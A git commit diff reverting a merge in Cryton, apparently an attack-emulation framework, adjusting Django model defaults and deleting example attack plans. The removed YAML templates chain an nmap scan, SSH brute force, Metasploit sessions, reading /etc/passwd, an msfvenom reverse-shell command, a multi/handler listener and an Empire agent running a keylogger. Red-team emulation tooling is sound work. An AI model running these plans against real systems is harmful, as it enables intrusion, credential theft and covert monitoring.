Revert "Merge branch 'fix-db-models-and-migrations' into 'master'"

cryton/cryton_app/migrations/0001_initial.py

-# Generated by Django 4.0.5 on 2022-06-20 18:41
+# Generated by Django 4.0.3 on 2022-03-08 16:11
 
 from django.db import migrations, models
 import django.db.models.deletion
@@ -137,11 +137,11 @@ class Migration(migrations.Migration):
                 ('start_time', models.DateTimeField(null=True)),
                 ('pause_time', models.DateTimeField(null=True)),
                 ('finish_time', models.DateTimeField(null=True)),
-                ('result', models.TextField(default='')),
-                ('std_out', models.TextField(default='')),
-                ('std_err', models.TextField(default='')),
-                ('mod_out', models.JSONField(default=dict)),
-                ('mod_err', models.TextField(default='')),
+                ('result', models.TextField()),
+                ('std_out', models.TextField()),
+                ('std_err', models.TextField()),
+                ('mod_out', models.JSONField(null=True)),
+                ('mod_err', models.TextField()),
                 ('evidence_file', models.TextField()),
                 ('valid', models.BooleanField(default=False)),
                 ('parent_id', models.IntegerField(null=True)),

cryton/cryton_app/models.py

@@ -85,7 +85,7 @@ class StepExecutionModel(ExecutionModel):
     result = models.TextField(default='')
     std_out = models.TextField(default='')
     std_err = models.TextField(default='')
-    mod_out = models.JSONField(default=dict)
+    mod_out = models.JSONField(default={})
     mod_err = models.TextField(default='')
     evidence_file = models.TextField()  # TODO: is this necessary? must be reworked with modules rework
     valid = models.BooleanField(default=False)

cryton/lib/models/step.py

@@ -976,7 +976,7 @@ class StepExecution:
             model.result = ""
             model.std_out = ""
             model.std_err = ""
-            model.mod_out = dict()
+            model.mod_out = None
             model.mod_err = ""
             model.evidence_file = ""
             model.valid = False

examples/advanced-example/execution-variables.yml

----
-bruteforce:
-  username: my_user
-  password: my_pass

examples/advanced-example/inventory.yml

----
-target: 127.0.0.1
-worker_ip: 127.0.0.1

examples/advanced-example/template.yml

----
-# This is an advanced example of Step chaining. In this example we combine output sharing,
-# MSFListener/HTTPListener triggers, execution variables, and sessions.
-# Required modules: mod_nmap, mod_medusa, mod_msf, mod_cmd.
-# To trigger the HTTPListener, use command "curl http://<target>:8082/index?test=test".
-# To trigger the MSFListener, generate the script using `msfvenom` tool
-# (msfvenom -p python/shell_reverse_tcp lhost=<Worker's IP address> lport=4444 > r_shell.py) and execute the script.
-
-plan:
-  name: Advanced example
-  owner: Cryton
-  stages:
-    - name: stage-get-etc-passwd
-      trigger_type: delta
-      trigger_args:
-        seconds: 0
-      steps:
-        - name: check-ssh
-          is_init: true
-          step_type: worker/execute
-          arguments:
-            module: mod_nmap
-            module_arguments:
-              target: {{ target }}
-              ports:
-                - 22
-          next:
-            - type: result
-              value: OK
-              step: bruteforce
-        - name: bruteforce
-          step_type: worker/execute
-          arguments:
-            module: mod_medusa
-            module_arguments:
-              target: {{ target }}
-              credentials:
-                username: "{{ bruteforce.username }}"
-                password: "{{ bruteforce.password }}"
-          next:
-            - type: result
-              value: OK
-              step: get-ssh-session
-        - name: get-ssh-session
-          step_type: worker/execute
-          arguments:
-            create_named_session: session_to_target_1
-            module: mod_msf
-            module_arguments:
-              module_type: auxiliary
-              module: scanner/ssh/ssh_login
-              module_options:
-                RHOSTS: {{ session.target }}
-                USERNAME: {{ session.username }}
-                PASSWORD: {{ session.password }}
-          next:
-            - type: result
-              value: OK
-              step: session-cmd
-        - name: session-cmd
-          step_type: worker/execute
-          arguments:
-            module: mod_cmd
-            module_arguments:
-              use_named_session: session_to_target_1
-              cmd: cat /etc/passwd
-
-    - name: stage-http
-      depends_on:
-        - stage-get-etc-passwd
-      trigger_type: HTTPListener
-      trigger_args:
-        host: 0.0.0.0
-        port: 8082
-        routes:
-          - path: /index
-            method: GET
-            parameters:
-              - name: test
-                value: test
-      steps:
-        - name: execute-command
-          is_init: true
-          step_type: worker/execute
-          arguments:
-            module: mod_cmd
-            module_arguments:
-              cmd: echo "it works!"
-
-    - name: stage-msf
-      depends_on:
-        - stage-http
-      trigger_type: MSFListener
-      trigger_args:
-        identifiers:
-          tunnel_peer: {{ worker_ip }}
-          via_exploit: exploit/multi/handler
-          via_payload: payload/python/shell_reverse_tcp
-        exploit: multi/handler
-        payload: python/shell_reverse_tcp
-        payload_arguments:
-          LHOST: {{ worker_ip }}
-          LPORT: 4444
-      steps:
-        - name: execute-in-session
-          is_init: true
-          step_type: worker/execute
-          arguments:
-            use_named_session: stage-msf_session
-            module: mod_cmd
-            module_arguments:
-              cmd: whoami

examples/basic-example/inventory.yml

----
-target: 127.0.0.1
-bruteforce:
-  username: my_user
-  password: my_pass

examples/basic-example/template.yml

----
-# This is a simple example of Step chaining.
-# Required modules: mod_cmd, mod_medusa.
-
-plan:
-  name: Basic example
-  owner: Cryton
-  stages:
-    - name: get-localhost-credentials
-      trigger_type: delta
-      trigger_args:
-        seconds: 0
-      steps:
-        - name: check-ssh
-          is_init: true
-          step_type: worker/execute
-          arguments:
-            module: mod_nmap
-            module_arguments:
-              target: {{ target }}
-              ports:
-                - 22
-          next:
-            - type: result
-              value: OK
-              step: bruteforce
-        - name: bruteforce
-          step_type: worker/execute
-          arguments:
-            module: mod_medusa
-            module_arguments:
-              target: {{ target }}
-              credentials:
-                username: {{ bruteforce.username }}
-                password: {{ bruteforce.password }}

examples/datetime-trigger-example/template.yml

----
-# This example shows how to use the DateTime trigger.
-# Required modules: mod_cmd.
-
-plan:
-  name: DateTime trigger example
-  owner: Cryton
-  stages:
-    - name: stage-one
-      trigger_type: datetime
-      trigger_args:
-        timezone: Europe/Prague
-        hour: 16
-      steps:
-        - name: execute-command
-          is_init: true
-          step_type: worker/execute
-          arguments:
-            module: mod_cmd
-            module_arguments:
-              cmd: echo "it works!"

examples/empire-agents-example/inventory.yml

----
-target:
-  public_ip: 127.0.0.1
-  username: my_user
-  password: my_pass

examples/empire-agents-example/template.yml

----
-# This example shows how to deploy an Empire agent, and how to execute a Shell command or an Empire module
-# using the deployed agent.
-# Required modules: mod_msf.
-
-plan:
-  name: Empire agents example
-  owner: Cryton
-  stages:
-    - name: stage-one
-      trigger_type: delta
-      trigger_args:
-        seconds: 0
-      steps:
-        - name: deploy-agent
-          step_type: empire/agent-deploy
-          is_init: true
-          arguments:
-            listener_name: testing
-            listener_port: 80
-            stager_type: multi/bash
-            agent_name: MyAgent # only lower/upper characters and numbers are allowed in name
-            ssh_connection:
-              target: {{ target.public_ip }}
-              username: {{ target.username }}
-              password: {{ target.password }}
-          next:
-            - type: result
-              value: OK
-              step: whoami-on-agent
-        - name: whoami-on-agent
-          step_type: empire/execute
-          arguments:
-            use_agent: MyAgent
-            shell_command: whoami
-          next:
-            - type: result
-              value: OK
-              step: keylogger-on-agent
-        - name: keylogger-on-agent
-          step_type: empire/execute
-          arguments:
-            use_agent: MyAgent
-            module: python/collection/linux/xkeylogger

examples/execution-variables-example/execution-variables.yml

----
-bruteforce:
-  username: my_user
-  password: my_pass

examples/execution-variables-example/inventory.yml

----
-target: 127.0.0.1

examples/execution-variables-example/template.yml

----
-# This example shows how to use execution variables.
-# Required modules: mod_nmap, mod_medusa.
-
-plan:
-  name: Execution variables example
-  owner: Cryton
-  stages:
-    - name: stage-one
-      trigger_type: delta
-      trigger_args:
-        seconds: 0
-      steps:
-        - name: scan-localhost
-          is_init: true
-          step_type: worker/execute
-          arguments:
-            module: mod_nmap
-            module_arguments:
-              target: {{ target }}
-              ports:
-                - 22
-          next:
-            - type: result
-              value: OK
-              step: bruteforce
-        - name: bruteforce
-          step_type: worker/execute
-          arguments:
-            module: mod_medusa
-            module_arguments:
-              target: {{ target }}
-              credentials:
-                username: "{{ bruteforce.username }}"
-                password: "{{ bruteforce.password }}"